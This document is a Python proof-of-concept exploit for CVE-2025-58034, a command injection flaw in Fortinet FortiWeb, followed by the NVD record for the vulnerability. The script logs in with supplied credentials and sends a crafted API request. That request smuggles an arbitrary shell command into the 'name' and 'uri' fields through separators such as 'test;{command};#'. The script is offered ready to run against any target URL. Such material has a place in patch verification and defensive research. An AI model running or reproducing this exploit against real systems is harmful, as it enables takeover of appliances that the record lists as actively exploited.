CVE-2025-58034

import requests import sys # CVE-2025-58034 PoC - FortiWeb OS Command Injection # Note: Requires authenticated high-privilege access def exploit_fortiweb(target_url, username, password, command): """ Exploit OS command injection in FortiWeb management interface """ # Login to FortiWeb login_url = f"{target_url}/api/v1/login" login_data = { "username": username, "password": password } session = requests.Session() try: # Attempt login response = session.post(login_url, json=login_data, verify=False, timeout=10) if response.status_code != 200: print(f"[-] Login failed: {response.status_code}") return False # Inject OS command via crafted HTTP request # The vulnerable endpoint may vary based on FortiWeb version inject_url = f"{target_url}/api/v1/cmdb/system/alert-email-setting" # Payload: inject command using command separators payload = { "name": f"test;{command};#", "uri": f"http://example.com;{command}" } response = session.post(inject_url, json=payload, verify=False, timeout=10) if response.status_code in [200, 201, 500]: print(f"[+] Command injection attempt sent: {command}") print(f"[+] Response: {response.text}") return True else: print(f"[-] Request failed: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve-2025-58034.py <target_url> <username> <password> <command>") print("Example: python cve-2025-58034.py https://fortiweb.local admin password 'id'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] cmd = sys.argv[4] exploit_fortiweb(target, user, pwd, cmd)

{"cve": {"id": "CVE-2025-58034", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:05.057", "lastModified": "2025-11-21T18:27:43.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4.0 through 7.4.10, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "cisaExploitAdd": "2025-11-18", "cisaActionDue": "2025-11-25", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Fortinet FortiWeb OS Command Injection Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.12", "matchCriteriaId": "CDE13E2A-CEC3-4FC7-98AD-11CA1EAEC0C0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.12", "matchCriteriaId": "551127B2-DCE9-403D-8073-ACD717CD0B19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.11", "matchCriteriaId": "F43B659D-6EA7-46F5-9778-0FD0FD036AA9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.6", "matchCriteriaId": "1E5D27F6-0659-4D98-9585-FD84B433CCB5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2", "matchCriteriaId": "F1DD8ABA-9BB5-4ED8-9E34-1CB0752651DF"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-513", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-58034", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}